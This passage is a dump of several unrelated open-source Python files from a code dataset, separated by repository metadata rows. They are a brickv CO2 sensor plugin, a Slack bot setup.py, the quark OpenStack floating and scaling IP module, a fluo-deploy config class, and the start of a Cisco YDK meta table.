MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public
License along with this program; if not, write to the
Free Software Foundation, Inc., 59 Temple Place - Suite 330,
Boston, MA 02111-1307, USA.
"""
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout
from brickv.plugin_system.comcu_plugin_base import COMCUPluginBase
from brickv.bindings.bricklet_co2_v2 import BrickletCO2V2
from brickv.plot_widget import PlotWidget, CurveValueWrapper
from brickv.callback_emulator import CallbackEmulator
class CO2V2(COMCUPluginBase):
def __init__(self, *args):
super().__init__(BrickletCO2V2, *args)
self.co2 = self.device
self.cbe_all_values = CallbackEmulator(self,
self.co2.get_all_values,
None,
self.cb_all_values,
self.increase_error_count)
self.current_co2 = CurveValueWrapper() # int, ppm
self.current_temperature = CurveValueWrapper() # float, °C
self.current_humidity = CurveValueWrapper() # float, %RH
plots_co2 = [('CO2', Qt.red, self.current_co2, '{} PPM'.format)]
self.plot_widget_co2 = PlotWidget('CO2 [PPM]', plots_co2, y_resolution=1.0)
plots_temperature = [('Temperature', Qt.red, self.current_temperature, '{} °C'.format)]
self.plot_widget_temperature = PlotWidget('Temperature [°C]', plots_temperature, y_resolution=0.01)
plots_humidity = [('Relative Humidity', Qt.red, self.current_humidity, '{} %RH'.format)]
self.plot_widget_humidity = PlotWidget('Relative Humidity [%RH]', plots_humidity, y_resolution=0.01)
layout_plot1 = QHBoxLayout()
layout_plot1.addWidget(self.plot_widget_co2)
layout_plot2 = QHBoxLayout()
layout_plot2.addWidget(self.plot_widget_temperature)
layout_plot2.addWidget(self.plot_widget_humidity)
layout_main = QVBoxLayout(self)
layout_main.addLayout(layout_plot1)
layout_main.addLayout(layout_plot2)
def cb_all_values(self, values):
self.current_co2.value = values.co2_concentration
self.current_temperature.value = values.temperature / 100.0
self.current_humidity.value = values.humidity / 100.0
def start(self):
self.cbe_all_values.set_period(250)
self.plot_widget_co2.stop = False
self.plot_widget_temperature.stop = False
self.plot_widget_humidity.stop = False
def stop(self):
self.cbe_all_values.set_period(0)
self.plot_widget_co2.stop = True
self.plot_widget_temperature.stop = True
self.plot_widget_humidity.stop = True
def destroy(self):
pass
@staticmethod
def has_device_identifier(device_identifier):
return device_identifier == BrickletCO2V2.DEVICE_IDENTIFIER
| gpl-2.0 | 1,356,080,298,779,096,300 | 37.543478 | 108 | 0.666949 | false |
dataloop/slactorbot | setup.py | 1 | 1466 | """
Slactorbot - A Python Slack Bot with hot patch!
"""
import os
import re
from setuptools import find_packages, setup
def fread(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
def get_version():
VERSIONFILE = "slactorbot/_version.py"
verstrline = fread(VERSIONFILE).strip()
vsre = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(vsre, verstrline, re.M)
if mo:
VERSION = mo.group(1)
else:
raise RuntimeError("Unable to find version string in %s." %
(VERSIONFILE, ))
return VERSION
dependencies = ['thespian', 'slackclient', 'pyyaml', 'requests']
setup(
name='slactorbot',
version=get_version(),
url='https://github.com/dataloop/slactorbot',
download_url="https://github.com/dataloop/slactorbot/tarball/v" + get_version(),
license="MIT",
author='Steven Acreman',
author_email='[email protected]',
description='A Python Slack Bot with hot patch!',
keywords="slack bot",
packages=find_packages(exclude=['tests']),
exclude_package_data={'': ['config.yaml']},
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=dependencies,
entry_points={
'console_scripts': [
"slactorbot = slactorbot.bot:start",
],
},
classifiers=[
"Intended Audience :: Developers",
"Intended Audience :: System Administrators"
])
| mit | -8,639,457,963,312,591,000 | 27.192308 | 84 | 0.61869 | false |
rackerlabs/quark | quark/plugin_modules/floating_ips.py | 1 | 24567 | # Copyright 2013 Rackspace Hosting Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib import exceptions as n_exc
from oslo_config import cfg
from oslo_log import log as logging
from quark import billing
from quark.db import api as db_api
from quark.db import ip_types
from quark.drivers import floating_ip_registry as registry
from quark import exceptions as q_exc
from quark import ipam
from quark import plugin_views as v
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
quark_router_opts = [
cfg.StrOpt('floating_ip_segment_name', default='floating_ip',
help=_('Segment name for floating IP subnets')),
cfg.StrOpt('floating_ip_ipam_strategy', default='ANY',
help=_('Override the network IPAM stategy for floating '
"allocation. Use 'NETWORK' to fall back to the "
"network's strategy")),
]
CONF.register_opts(quark_router_opts, 'QUARK')
def _get_network(context, network_id):
network = db_api.network_find(context, id=network_id, scope=db_api.ONE)
if not network:
raise n_exc.NetworkNotFound(net_id=network_id)
return network
def _get_port(context, port_id):
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
if not port:
raise n_exc.PortNotFound(port_id=port_id)
if not port.ip_addresses or len(port.ip_addresses) == 0:
raise q_exc.NoAvailableFixedIpsForPort(port_id=port_id)
return port
def _get_fixed_ip(context, given_fixed_ip, port):
if not given_fixed_ip:
fixed_ip = _get_next_available_fixed_ip(port)
if not fixed_ip:
raise q_exc.NoAvailableFixedIpsForPort(
port_id=port.id)
else:
fixed_ip = next((ip for ip in port.ip_addresses
if (ip['address_readable'] == given_fixed_ip and
ip.get('address_type') == ip_types.FIXED)),
None)
if not fixed_ip:
raise q_exc.FixedIpDoesNotExistsForPort(
fixed_ip=given_fixed_ip, port_id=port.id)
if any(ip for ip in port.ip_addresses
if (ip.get('address_type') in (ip_types.FLOATING,
ip_types.SCALING) and
ip.fixed_ip['address_readable'] == given_fixed_ip)):
raise q_exc.PortAlreadyContainsFloatingIp(
port_id=port.id)
return fixed_ip
def _allocate_ip(context, network, port, requested_ip_address, address_type):
new_addresses = []
ip_addresses = []
if requested_ip_address:
ip_addresses.append(requested_ip_address)
seg_name = CONF.QUARK.floating_ip_segment_name
strategy_name = CONF.QUARK.floating_ip_ipam_strategy
if strategy_name.upper() == 'NETWORK':
strategy_name = network.get("ipam_strategy")
port_id = port
if port:
port_id = port.id
ipam_driver = ipam.IPAM_REGISTRY.get_strategy(strategy_name)
ipam_driver.allocate_ip_address(context, new_addresses, network.id,
port_id, CONF.QUARK.ipam_reuse_after,
seg_name, version=4,
ip_addresses=ip_addresses,
address_type=address_type)
return new_addresses[0]
def _get_next_available_fixed_ip(port):
floating_ips = [ip for ip in port.ip_addresses
if ip.get('address_type') in
(ip_types.FLOATING, ip_types.SCALING)]
fixed_ips = [ip for ip in port.ip_addresses
if ip.get('address_type') == ip_types.FIXED]
if not fixed_ips or len(fixed_ips) == 0:
return None
used = [ip.fixed_ip.address for ip in floating_ips
if ip and ip.fixed_ip]
return next((ip for ip in sorted(fixed_ips,
key=lambda ip: ip.get('allocated_at'))
if ip.address not in used), None)
def _get_ips_by_type(context, ip_type, filters=None, fields=None):
filters = filters or {}
filters['_deallocated'] = False
filters['address_type'] = ip_type
ips = db_api.floating_ip_find(context, scope=db_api.ALL, **filters)
return ips
def _create_flip(context, flip, port_fixed_ips):
"""Associates the flip with ports and creates it with the flip driver
:param context: neutron api request context.
:param flip: quark.db.models.IPAddress object representing a floating IP
:param port_fixed_ips: dictionary of the structure:
{"<id of port>": {"port": <quark.db.models.Port>,
"fixed_ip": "<fixed ip address>"}}
:return: None
"""
if port_fixed_ips:
context.session.begin()
try:
ports = [val['port'] for val in port_fixed_ips.values()]
flip = db_api.port_associate_ip(context, ports, flip,
port_fixed_ips.keys())
for port_id in port_fixed_ips:
fixed_ip = port_fixed_ips[port_id]['fixed_ip']
flip = db_api.floating_ip_associate_fixed_ip(context, flip,
fixed_ip)
flip_driver = registry.DRIVER_REGISTRY.get_driver()
flip_driver.register_floating_ip(flip, port_fixed_ips)
context.session.commit()
except Exception:
context.session.rollback()
raise
# alexm: Notify from this method for consistency with _delete_flip
billing.notify(context, 'ip.associate', flip)
def _get_flip_fixed_ip_by_port_id(flip, port_id):
for fixed_ip in flip.fixed_ips:
if fixed_ip.ports[0].id == port_id:
return fixed_ip
def _update_flip(context, flip_id, ip_type, requested_ports):
"""Update a flip based IPAddress
:param context: neutron api request context.
:param flip_id: id of the flip or scip
:param ip_type: ip_types.FLOATING | ip_types.SCALING
:param requested_ports: dictionary of the structure:
{"port_id": "<id of port>", "fixed_ip": "<fixed ip address>"}
:return: quark.models.IPAddress
"""
# This list will hold flips that require notifications.
# Using sets to avoid dups, if any.
notifications = {
'ip.associate': set(),
'ip.disassociate': set()
}
context.session.begin()
try:
flip = db_api.floating_ip_find(context, id=flip_id, scope=db_api.ONE)
if not flip:
if ip_type == ip_types.SCALING:
raise q_exc.ScalingIpNotFound(id=flip_id)
raise q_exc.FloatingIpNotFound(id=flip_id)
current_ports = flip.ports
# Determine what ports are being removed, being added, and remain
req_port_ids = [request_port.get('port_id')
for request_port in requested_ports]
curr_port_ids = [curr_port.id for curr_port in current_ports]
added_port_ids = [port_id for port_id in req_port_ids
if port_id and port_id not in curr_port_ids]
removed_port_ids = [port_id for port_id in curr_port_ids
if port_id not in req_port_ids]
remaining_port_ids = set(curr_port_ids) - set(removed_port_ids)
# Validations just for floating ip types
if (ip_type == ip_types.FLOATING and curr_port_ids and
curr_port_ids == req_port_ids):
d = dict(flip_id=flip_id, port_id=curr_port_ids[0])
raise q_exc.PortAlreadyAssociatedToFloatingIp(**d)
if (ip_type == ip_types.FLOATING and
not curr_port_ids and not req_port_ids):
raise q_exc.FloatingIpUpdateNoPortIdSupplied()
port_fixed_ips = {}
# Keep the ports and fixed ips that have not changed
for port_id in remaining_port_ids:
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
fixed_ip = _get_flip_fixed_ip_by_port_id(flip, port_id)
port_fixed_ips[port_id] = {'port': port, 'fixed_ip': fixed_ip}
# Disassociate the ports and fixed ips from the flip that were
# associated to the flip but are not anymore
for port_id in removed_port_ids:
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
flip = db_api.port_disassociate_ip(context, [port], flip)
notifications['ip.disassociate'].add(flip)
fixed_ip = _get_flip_fixed_ip_by_port_id(flip, port_id)
if fixed_ip:
flip = db_api.floating_ip_disassociate_fixed_ip(
context, flip, fixed_ip)
# Validate the new ports with the flip and associate the new ports
# and fixed ips with the flip
for port_id in added_port_ids:
port = db_api.port_find(context, id=port_id, scope=db_api.ONE)
if not port:
raise n_exc.PortNotFound(port_id=port_id)
if any(ip for ip in port.ip_addresses
if (ip.get('address_type') == ip_types.FLOATING)):
raise q_exc.PortAlreadyContainsFloatingIp(port_id=port_id)
if any(ip for ip in port.ip_addresses
if (ip.get('address_type') == ip_types.SCALING)):
raise q_exc.PortAlreadyContainsScalingIp(port_id=port_id)
fixed_ip = _get_next_available_fixed_ip(port)
LOG.info('new fixed ip: %s' % fixed_ip)
if not fixed_ip:
raise q_exc.NoAvailableFixedIpsForPort(port_id=port_id)
port_fixed_ips[port_id] = {'port': port, 'fixed_ip': fixed_ip}
flip = db_api.port_associate_ip(context, [port], flip, [port_id])
notifications['ip.associate'].add(flip)
flip = db_api.floating_ip_associate_fixed_ip(context, flip,
fixed_ip)
flip_driver = registry.DRIVER_REGISTRY.get_driver()
# If there are not any remaining ports and no new ones are being added,
# remove the floating ip from unicorn
if not remaining_port_ids and not added_port_ids:
flip_driver.remove_floating_ip(flip)
# If new ports are being added but there previously was not any ports,
# then register a new floating ip with the driver because it is
# assumed it does not exist
elif added_port_ids and not curr_port_ids:
flip_driver.register_floating_ip(flip, port_fixed_ips)
else:
flip_driver.update_floating_ip(flip, port_fixed_ips)
context.session.commit()
except Exception:
context.session.rollback()
raise
# Send notifications for possible associate/disassociate events
for notif_type, flip_set in notifications.iteritems():
for flip in flip_set:
billing.notify(context, notif_type, flip)
# NOTE(blogan): ORM does not seem to update the model to the real state
# of the database, so I'm doing an explicit refresh for now.
context.session.refresh(flip)
return flip
def _delete_flip(context, id, address_type):
filters = {'address_type': address_type, '_deallocated': False}
flip = db_api.floating_ip_find(context, id=id, scope=db_api.ONE, **filters)
if not flip:
raise q_exc.FloatingIpNotFound(id=id)
current_ports = flip.ports
if address_type == ip_types.FLOATING:
if current_ports:
current_ports = [flip.ports[0]]
elif address_type == ip_types.SCALING:
current_ports = flip.ports
context.session.begin()
try:
strategy_name = flip.network.get('ipam_strategy')
ipam_driver = ipam.IPAM_REGISTRY.get_strategy(strategy_name)
ipam_driver.deallocate_ip_address(context, flip)
if current_ports:
db_api.port_disassociate_ip(context, current_ports, flip)
if flip.fixed_ips:
db_api.floating_ip_disassociate_all_fixed_ips(context, flip)
context.session.commit()
except Exception:
context.session.rollback()
raise
try:
driver = registry.DRIVER_REGISTRY.get_driver()
driver.remove_floating_ip(flip)
except Exception as e:
LOG.error('There was an error when trying to delete the floating ip '
'on the unicorn API. The ip has been cleaned up, but '
'may need to be handled manually in the unicorn API. '
'Error: %s' % e.message)
# alexm: Notify from this method because we don't have the flip object
# in the callers
billing.notify(context, 'ip.disassociate', flip)
def create_floatingip(context, content):
"""Allocate or reallocate a floating IP.
:param context: neutron api request context.
:param content: dictionary describing the floating ip, with keys
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py. All keys will be populated.
:returns: Dictionary containing details for the new floating IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('create_floatingip %s for tenant %s and body %s' %
(id, context.tenant_id, content))
network_id = content.get('floating_network_id')
# TODO(blogan): Since the extension logic will reject any requests without
# floating_network_id, is this still needed?
if not network_id:
raise n_exc.BadRequest(resource='floating_ip',
msg='floating_network_id is required.')
fixed_ip_address = content.get('fixed_ip_address')
ip_address = content.get('floating_ip_address')
port_id = content.get('port_id')
port = None
port_fixed_ip = {}
network = _get_network(context, network_id)
if port_id:
port = _get_port(context, port_id)
fixed_ip = _get_fixed_ip(context, fixed_ip_address, port)
port_fixed_ip = {port.id: {'port': port, 'fixed_ip': fixed_ip}}
flip = _allocate_ip(context, network, port, ip_address, ip_types.FLOATING)
_create_flip(context, flip, port_fixed_ip)
return v._make_floating_ip_dict(flip, port_id)
def update_floatingip(context, id, content):
"""Update an existing floating IP.
:param context: neutron api request context.
:param id: id of the floating ip
:param content: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for 'allow_put'
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py.
:returns: Dictionary containing details for the new floating IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('update_floatingip %s for tenant %s and body %s' %
(id, context.tenant_id, content))
if 'port_id' not in content:
raise n_exc.BadRequest(resource='floating_ip',
msg='port_id is required.')
requested_ports = []
if content.get('port_id'):
requested_ports = [{'port_id': content.get('port_id')}]
flip = _update_flip(context, id, ip_types.FLOATING, requested_ports)
return v._make_floating_ip_dict(flip)
def delete_floatingip(context, id):
"""deallocate a floating IP.
:param context: neutron api request context.
:param id: id of the floating ip
"""
LOG.info('delete_floatingip %s for tenant %s' % (id, context.tenant_id))
_delete_flip(context, id, ip_types.FLOATING)
def get_floatingip(context, id, fields=None):
"""Retrieve a floating IP.
:param context: neutron api request context.
:param id: The UUID of the floating IP.
:param fields: a list of strings that are valid keys in a
floating IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: Dictionary containing details for the floating IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('get_floatingip %s for tenant %s' % (id, context.tenant_id))
filters = {'address_type': ip_types.FLOATING, '_deallocated': False}
floating_ip = db_api.floating_ip_find(context, id=id, scope=db_api.ONE,
**filters)
if not floating_ip:
raise q_exc.FloatingIpNotFound(id=id)
return v._make_floating_ip_dict(floating_ip)
def get_floatingips(context, filters=None, fields=None, sorts=None, limit=None,
marker=None, page_reverse=False):
"""Retrieve a list of floating ips.
:param context: neutron api request context.
:param filters: a dictionary with keys that are valid keys for
a floating ip as listed in the RESOURCE_ATTRIBUTE_MAP object
in neutron/api/v2/attributes.py. Values in this dictionary
are an iterable containing values that will be used for an exact
match comparison for that value. Each result returned by this
function will have matched one of the values for each key in
filters.
:param fields: a list of strings that are valid keys in a
floating IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: List of floating IPs that are accessible to the tenant who
submits the request (as indicated by the tenant id of the context)
as well as any filters.
"""
LOG.info('get_floatingips for tenant %s filters %s fields %s' %
(context.tenant_id, filters, fields))
floating_ips = _get_ips_by_type(context, ip_types.FLOATING,
filters=filters, fields=fields)
return [v._make_floating_ip_dict(flip) for flip in floating_ips]
def get_floatingips_count(context, filters=None):
"""Return the number of floating IPs.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a floating IP as listed in the RESOURCE_ATTRIBUTE_MAP object
in neutron/api/v2/attributes.py. Values in this dictionary
are an iterable containing values that will be used for an exact
match comparison for that value. Each result returned by this
function will have matched one of the values for each key in
filters.
:returns: The number of floating IPs that are accessible to the tenant who
submits the request (as indicated by the tenant id of the context)
as well as any filters.
NOTE: this method is optional, as it was not part of the originally
defined plugin API.
"""
LOG.info('get_floatingips_count for tenant %s filters %s' %
(context.tenant_id, filters))
if filters is None:
filters = {}
filters['_deallocated'] = False
filters['address_type'] = ip_types.FLOATING
count = db_api.ip_address_count_all(context, filters)
LOG.info('Found %s floating ips for tenant %s' % (count,
context.tenant_id))
return count
def create_scalingip(context, content):
"""Allocate or reallocate a scaling IP.
:param context: neutron api request context.
:param content: dictionary describing the scaling ip, with keys
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py. All keys will be populated.
:returns: Dictionary containing details for the new scaling IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('create_scalingip for tenant %s and body %s',
context.tenant_id, content)
network_id = content.get('scaling_network_id')
ip_address = content.get('scaling_ip_address')
requested_ports = content.get('ports', [])
network = _get_network(context, network_id)
port_fixed_ips = {}
for req_port in requested_ports:
port = _get_port(context, req_port['port_id'])
fixed_ip = _get_fixed_ip(context, req_port.get('fixed_ip_address'),
port)
port_fixed_ips[port.id] = {"port": port, "fixed_ip": fixed_ip}
scip = _allocate_ip(context, network, None, ip_address, ip_types.SCALING)
_create_flip(context, scip, port_fixed_ips)
return v._make_scaling_ip_dict(scip)
def update_scalingip(context, id, content):
"""Update an existing scaling IP.
:param context: neutron api request context.
:param id: id of the scaling ip
:param content: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for 'allow_put'
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py.
:returns: Dictionary containing details for the new scaling IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('update_scalingip %s for tenant %s and body %s' %
(id, context.tenant_id, content))
requested_ports = content.get('ports', [])
flip = _update_flip(context, id, ip_types.SCALING, requested_ports)
return v._make_scaling_ip_dict(flip)
def delete_scalingip(context, id):
"""Deallocate a scaling IP.
:param context: neutron api request context.
:param id: id of the scaling ip
"""
LOG.info('delete_scalingip %s for tenant %s' % (id, context.tenant_id))
_delete_flip(context, id, ip_types.SCALING)
def get_scalingip(context, id, fields=None):
"""Retrieve a scaling IP.
:param context: neutron api request context.
:param id: The UUID of the scaling IP.
:param fields: a list of strings that are valid keys in a
scaling IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: Dictionary containing details for the scaling IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('get_scalingip %s for tenant %s' % (id, context.tenant_id))
filters = {'address_type': ip_types.SCALING, '_deallocated': False}
scaling_ip = db_api.floating_ip_find(context, id=id, scope=db_api.ONE,
**filters)
if not scaling_ip:
raise q_exc.ScalingIpNotFound(id=id)
return v._make_scaling_ip_dict(scaling_ip)
def get_scalingips(context, filters=None, fields=None, sorts=None, limit=None,
marker=None, page_reverse=False):
"""Retrieve a list of scaling ips.
:param context: neutron api request context.
:param filters: a dictionary with keys that are valid keys for
a scaling ip as listed in the RESOURCE_ATTRIBUTE_MAP object
in neutron/api/v2/attributes.py. Values in this dictionary
are an iterable containing values that will be used for an exact
match comparison for that value. Each result returned by this
function will have matched one of the values for each key in
filters.
:param fields: a list of strings that are valid keys in a
scaling IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: List of scaling IPs that are accessible to the tenant who
submits the request (as indicated by the tenant id of the context)
as well as any filters.
"""
LOG.info('get_scalingips for tenant %s filters %s fields %s' %
(context.tenant_id, filters, fields))
scaling_ips = _get_ips_by_type(context, ip_types.SCALING,
filters=filters, fields=fields)
return [v._make_scaling_ip_dict(scip) for scip in scaling_ips]
| apache-2.0 | -7,158,888,643,166,104,000 | 39.076672 | 79 | 0.631294 | false |
ericnewton/fluo-deploy | bin/impl/fluo_deploy/config.py | 1 | 8132 | # Copyright 2014 Fluo authors (see AUTHORS)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ConfigParser import ConfigParser
from util import get_num_ephemeral, exit, get_arch, get_ami
import os
from os.path import join
SERVICES = ['zookeeper', 'namenode', 'resourcemanager', 'accumulomaster', 'worker', 'fluo', 'metrics']
class DeployConfig(ConfigParser):
def __init__(self, deploy_path, config_path, hosts_path, cluster_name):
ConfigParser.__init__(self)
self.deploy_path = deploy_path
self.read(config_path)
self.hosts_path = hosts_path
self.cluster_name = cluster_name
self.ephemeral_root = 'ephemeral'
self.mount_root = '/media/' + self.ephemeral_root
self.device_root = '/dev/xvd'
self.metrics_drive_root = 'media-' + self.ephemeral_root
self.node_d = None
self.hosts = None
self.init_nodes()
def verify_config(self, action):
proxy = self.get('general', 'proxy_hostname')
if not proxy:
exit("ERROR - proxy.hostname must be set in fluo-deploy.props")
if proxy not in self.node_d:
exit("ERROR - The proxy (set by property proxy.hostname={0}) cannot be found in 'nodes' section of fluo-deploy.props".format(proxy))
if action != 'launch':
self.proxy_public_ip()
if action in ['launch', 'setup']:
self.get_image_id(self.get('ec2', 'default_instance_type'))
self.get_image_id(self.get('ec2', 'worker_instance_type'))
for service in SERVICES:
if service not in ['fluo', 'metrics']:
if not self.has_service(service):
exit("ERROR - Missing '{0}' service from [nodes] section of fluo-deploy.props".format(service))
def init_nodes(self):
self.node_d = {}
for (hostname, value) in self.items('nodes'):
if hostname in self.node_d:
exit('Hostname {0} already exists twice in nodes'.format(hostname))
service_list = []
for service in value.split(','):
if service in SERVICES:
service_list.append(service)
else:
exit('Unknown service "%s" declared for node %s' % (service, hostname))
self.node_d[hostname] = service_list
def default_num_ephemeral(self):
return get_num_ephemeral(self.get('ec2', 'default_instance_type'))
def worker_num_ephemeral(self):
return get_num_ephemeral(self.get('ec2', 'worker_instance_type'))
def max_ephemeral(self):
return max((self.worker_num_ephemeral(), self.default_num_ephemeral()))
def node_type_map(self):
node_types = {}
node_list = [('default', self.default_num_ephemeral()), ('worker', self.worker_num_ephemeral())]
for (ntype, num_ephemeral) in node_list:
node_types[ntype] = {'mounts': self.mounts(num_ephemeral), 'devices': self.devices(num_ephemeral)}
return node_types
def node_type(self, hostname):
if 'worker' in self.node_d[hostname]:
return 'worker'
return 'default'
def num_ephemeral(self, hostname):
if 'worker' in self.node_d[hostname]:
return self.worker_num_ephemeral()
else:
return self.default_num_ephemeral()
def mounts(self, num_ephemeral):
mounts = []
for i in range(0, num_ephemeral):
mounts.append(self.mount_root + str(i))
return tuple(mounts)
def devices(self, num_ephemeral):
devices = []
for i in range(0, num_ephemeral):
devices.append(self.device_root + chr(ord('b') + i))
return tuple(devices)
def metrics_drive_ids(self):
drive_ids = []
for i in range(0, self.max_ephemeral()):
drive_ids.append(self.metrics_drive_root + str(i))
return tuple(drive_ids)
def version(self, software_id):
return self.get('general', software_id + '_version')
def sha256(self, software_id):
return self.get('general', software_id + '_sha256')
def get_image_id(self, instance_type):
if get_arch(instance_type) == 'pvm':
exit("ERROR - Configuration contains instance type '{0}' that uses pvm architecture. Only hvm architecture is supported!".format(instance_type))
return get_ami(instance_type, self.get('ec2', 'region'))
def instance_tags(self):
retd = {}
if self.has_option('ec2', 'instance.tags'):
value = self.get('ec2', 'instance.tags')
if value:
for kv in value.split(','):
(key, val) = kv.split(':')
retd[key] = val
return retd
def nodes(self):
return self.node_d
def get_node(self, hostname):
return self.node_d[hostname]
def has_service(self, service):
for (hostname, service_list) in self.node_d.items():
if service in service_list:
return True
return False
def get_host_services(self):
retval = []
for (hostname, service_list) in self.node_d.items():
retval.append((hostname, ' '.join(service_list)))
retval.sort()
return retval
def get_service_private_ips(self, service):
retval = []
for (hostname, service_list) in self.node_d.items():
if service in service_list:
retval.append(self.get_private_ip(hostname))
retval.sort()
return retval
def get_service_hostnames(self, service):
retval = []
for (hostname, service_list) in self.node_d.items():
if service in service_list:
retval.append(hostname)
retval.sort()
return retval
def get_non_proxy(self):
retval = []
proxy_ip = self.get_private_ip(self.get('general', 'proxy_hostname'))
for (hostname, (private_ip, public_ip)) in self.hosts.items():
if private_ip != proxy_ip:
retval.append((private_ip, hostname))
retval.sort()
return retval
def get_private_ip_hostnames(self):
retval = []
for (hostname, (private_ip, public_ip)) in self.hosts.items():
retval.append((private_ip, hostname))
retval.sort()
return retval
def parse_hosts(self):
if not os.path.isfile(self.hosts_path):
exit('ERROR - A hosts file does not exist at %s' % self.hosts_path)
self.hosts = {}
with open(self.hosts_path) as f:
for line in f:
line = line.strip()
if line.startswith("#") or not line:
continue
args = line.split(' ')
if len(args) == 2:
self.hosts[args[0]] = (args[1], None)
elif len(args) == 3:
self.hosts[args[0]] = (args[1], args[2])
else:
exit('ERROR - Bad line %s in hosts %s' % (line, self.hosts_path))
def get_hosts(self):
if self.hosts is None:
self.parse_hosts()
return self.hosts
def get_private_ip(self, hostname):
return self.get_hosts()[hostname][0]
def get_public_ip(self, hostname):
return self.get_hosts()[hostname][1]
def proxy_public_ip(self):
retval = self.get_public_ip(self.get('general', 'proxy_hostname'))
if not retval:
exit("ERROR - Leader {0} does not have a public IP".format(self.get('general', 'proxy_hostname')))
return retval
def proxy_private_ip(self):
return self.get_private_ip(self.get('general', 'proxy_hostname'))
def get_performance_prop(self, prop):
profile = self.get('performance', 'profile')
return self.get(profile, prop)
def print_all(self):
print 'proxy_public_ip = ', self.proxy_public_ip()
for (name, val) in self.items('general'):
print name, '=', val
for (name, val) in self.items('ec2'):
print name, '=', val
def print_property(self, key):
if key == 'proxy.public.ip':
print self.proxy_public_ip()
return
else:
for section in self.sections():
if self.has_option(section, key):
print self.get(section, key)
return
exit("Property '{0}' was not found".format(key))
| apache-2.0 | 4,391,550,371,819,126,000 | 31.790323 | 151 | 0.641048 | false |
111pontes/ydk-py | cisco-ios-xr/ydk/models/cisco_ios_xr/_meta/_Cisco_IOS_XR_aaa_diameter_oper.py | 1 | 2653 |
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION, ANYXML_CLASS
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'DisconnectCauseEnum' : _MetaInfoEnum('DisconnectCauseEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_diameter_oper',
{
'reboot':'reboot',
'busy':'busy',
'do-not-wait-to-talk':'do_not_wait_to_talk',
}, 'Cisco-IOS-XR-aaa-diameter-oper', _yang_ns._namespaces['Cisco-IOS-XR-aaa-diameter-oper']),
'PeerEnum' : _MetaInfoEnum('PeerEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_diameter_oper',
{
'undefined':'undefined',
'server':'server',
}, 'Cisco-IOS-XR-aaa-diameter-oper', _yang_ns._namespaces['Cisco-IOS-XR-aaa-diameter-oper']),
'PeerStateValueEnum' : _MetaInfoEnum('PeerStateValueEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_diameter_oper',
{
'state-none':'state_none',
'closed':'closed',
'wait-connection-ack':'wait_connection_ack',
'wait-cea':'wait_cea',
'state-open':'state_open',
'closing':'closing',
'suspect':'suspect',
}, 'Cisco-IOS-XR-aaa-diameter-oper', _yang_ns._namespaces['Cisco-IOS-XR-aaa-diameter-oper']),
'WhoInitiatedDisconnectEnum' : _MetaInfoEnum('WhoInitiatedDisconnectEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_diameter_oper',
{
'none':'none',
'host':'host',
'peer':'peer',
}, 'Cisco-IOS-XR-aaa-diameter-oper', _yang_ns._namespaces['Cisco-IOS-XR-aaa-diameter-oper']),
'ProtocolTypeValueEnum' : _MetaInfoEnum('ProtocolTypeValueEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_diameter_oper',
{
'protocol-none':'protocol_none',
